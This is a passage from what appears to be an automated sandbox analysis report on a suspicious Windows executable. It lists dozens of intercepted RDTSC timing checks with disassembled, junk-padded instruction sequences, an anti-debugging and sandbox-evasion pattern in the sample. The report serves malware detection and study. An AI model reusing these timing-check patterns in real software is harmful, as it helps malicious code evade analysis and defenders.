ecx 0x00000058 mov dword ptr [esp+04h], ecx 0x0000005c add dword ptr [esp+04h], 0000001Ch 0x00000064 inc ecx 0x00000065 push ecx 0x00000066 ret 0x00000067 pop ecx 0x00000068 ret 0x00000069 mov ebx, dword ptr [ebp+122D39CBh] 0x0000006f push eax 0x00000070 jc 00007F9F112ED7A2h 0x00000076 jl 00007F9F112ED79Ch 0x0000007c push eax 0x0000007d push edx 0x0000007e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E58174 second address: E58188 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C00h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E58188 second address: E5819F instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F9F112ED798h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007F9F112ED798h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E57302 second address: E5739B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F10525BFBh 0x0000000d pop edx 0x0000000e nop 0x0000000f ja 00007F9F10525BFCh 0x00000015 push dword ptr fs:[00000000h] 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F9F10525BF8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d jnp 00007F9F10525BFCh 0x00000043 mov dword ptr [ebp+122D25CDh], ebx 0x00000049 mov eax, dword ptr [ebp+122D170Dh] 0x0000004f mov edi, dword ptr [ebp+122D390Bh] 0x00000055 push FFFFFFFFh 0x00000057 jmp 00007F9F10525BFBh 0x0000005c nop 0x0000005d jng 00007F9F10525C08h 0x00000063 jmp 00007F9F10525C02h 0x00000068 push eax 0x00000069 pushad 0x0000006a push ebx 0x0000006b jne 00007F9F10525BF6h 0x00000071 pop ebx 0x00000072 push edx 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5819F second address: E581A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E581A5 second address: E581A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5CF03 second address: E5CF09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6022B second address: E6022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6022F second address: E6023E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F9F112ED796h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5F9FE second address: E5FA05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5FA05 second address: E5FA0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5FA0B second address: E5FA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E5FA0F second address: E5FA1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E63F67 second address: E63FBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F10525BFAh 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jng 00007F9F10525BF8h 0x00000014 jmp 00007F9F10525C03h 0x00000019 popad 0x0000001a mov eax, dword ptr [esp+04h] 0x0000001e pushad 0x0000001f jmp 00007F9F10525C04h 0x00000024 push ecx 0x00000025 jnl 00007F9F10525BF6h 0x0000002b pop ecx 0x0000002c popad 0x0000002d mov eax, dword ptr [eax] 0x0000002f pushad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 pop eax 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6A59A second address: E6A59E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6A59E second address: E6A5D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F9F10525C0Bh 0x0000000c push ecx 0x0000000d jnp 00007F9F10525BFEh 0x00000013 jl 00007F9F10525BF6h 0x00000019 push eax 0x0000001a pop eax 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6A76A second address: E6A77C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9F112ED79Eh 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007F9F112ED796h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6AA7C second address: E6AA8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 ja 00007F9F10525BF6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6AA8C second address: E6AA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6AA95 second address: E6AA9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6AA9B second address: E6AAB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A3h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6ADA2 second address: E6ADA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6F30C second address: E6F312 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6F452 second address: E6F458 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6F458 second address: E6F45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6F5A4 second address: E6F5A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6F6DA second address: E6F741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F9F112ED7C2h 0x0000000c jbe 00007F9F112ED798h 0x00000012 pushad 0x00000013 jne 00007F9F112ED796h 0x00000019 jmp 00007F9F112ED7A6h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push ebx 0x00000025 pushad 0x00000026 popad 0x00000027 pop ebx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FA63 second address: E6FA67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FA67 second address: E6FA80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FD4A second address: E6FD52 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FD52 second address: E6FD56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FD56 second address: E6FD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F10525C09h 0x0000000d jbe 00007F9F10525BF6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FEF5 second address: E6FEFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E6FEFD second address: E6FF03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E70072 second address: E70076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E70076 second address: E7007F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E701DE second address: E701FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F9F112ED7A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E701FB second address: E70213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C04h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E70213 second address: E70232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F9F112ED798h 0x0000000f jnc 00007F9F112ED79Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E70232 second address: E70237 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E037E4 second address: E037EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E037EA second address: E037F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 jnp 00007F9F10525BF6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E037F9 second address: E037FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7432C second address: E74330 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E74330 second address: E7434A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9F112ED7A4h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E776E5 second address: E77705 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9F10525C07h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E77705 second address: E7771A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 jng 00007F9F112ED79Ah 0x0000000d pushad 0x0000000e popad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7771A second address: E7771E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7771E second address: E77724 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B879 second address: E7B87F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B87F second address: E7B88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B88E second address: E7B89C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jno 00007F9F10525BF6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B89C second address: E7B8A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B8A3 second address: E7B8BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F9F10525C05h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B8BE second address: E7B8D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F9F112ED79Fh 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7B8D7 second address: E7B8DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3999C second address: E399A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E399A1 second address: E242C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9F10525BFEh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F9F10525BF8h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 0000001Ah 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 add ecx, dword ptr [ebp+122D1E9Ah] 0x0000002f lea eax, dword ptr [ebp+12484730h] 0x00000035 mov dword ptr [ebp+122D2811h], esi 0x0000003b push eax 0x0000003c jl 00007F9F10525C0Bh 0x00000042 mov dword ptr [esp], eax 0x00000045 or dword ptr [ebp+122D31C4h], edi 0x0000004b call dword ptr [ebp+122D3256h] 0x00000051 push ebx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F9F10525C08h 0x00000059 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E39EB0 second address: E39EC6 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9F112ED79Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E39EC6 second address: E39ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3A072 second address: E3A078 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3A8CD second address: E3A8EB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F10525C01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3AC0F second address: E3AC13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E3AC13 second address: E3AC44 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a pushad 0x0000000b mov ecx, esi 0x0000000d xor eax, 290477A7h 0x00000013 popad 0x00000014 lea eax, dword ptr [ebp+12484774h] 0x0000001a add edx, dword ptr [ebp+122D3242h] 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 jg 00007F9F10525BF6h 0x0000002a jbe 00007F9F10525BF6h 0x00000030 popad 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C453 second address: E7C459 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C459 second address: E7C45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C59E second address: E7C5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5A4 second address: E7C5B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 jp 00007F9F10525BF6h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5B6 second address: E7C5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F9F112ED796h 0x0000000a popad 0x0000000b jne 00007F9F112ED79Ch 0x00000011 js 00007F9F112ED796h 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5D0 second address: E7C5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5D6 second address: E7C5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c jne 00007F9F112ED796h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5E8 second address: E7C5F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F9F10525BF6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C5F6 second address: E7C60E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9F112ED7A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E7C60E second address: E7C61F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F9F10525BF6h 0x00000009 jl 00007F9F10525BF6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80F01 second address: E80F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jc 00007F9F112ED796h 0x0000000c popad 0x0000000d pushad 0x0000000e jns 00007F9F112ED796h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80F17 second address: E80F1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80F1F second address: E80F2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F9F112ED796h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E811F3 second address: E811F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E811F7 second address: E81203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jns 00007F9F112ED796h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E81203 second address: E81220 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F9F10525BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jmp 00007F9F10525BFDh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E81220 second address: E81224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E814DB second address: E814DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8161C second address: E8162C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F9F112ED796h 0x0000000a popad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E8162C second address: E81656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F9F10525BF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f jmp 00007F9F10525C03h 0x00000014 jnp 00007F9F10525BFCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BA2 second address: E80BA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BA6 second address: E80BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fer4JIJGeL.exeRDTSC instruction interceptor: First address: E80BAA second address: E80BC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F9F112ED796h 0x0000000d jnl 00007F9F112ED796h 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
